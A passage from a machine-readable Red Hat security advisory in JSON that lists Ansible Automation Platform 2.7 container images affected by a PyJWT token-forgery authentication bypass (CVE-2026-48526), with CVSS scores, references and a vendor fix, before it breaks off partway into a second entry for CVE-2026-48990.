"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "RHBZ#2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"release_date": "2026-05-28T15:09:09.258000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens"
},
{
"cve": "CVE-2026-48990",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-17T22:00:51.839483+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
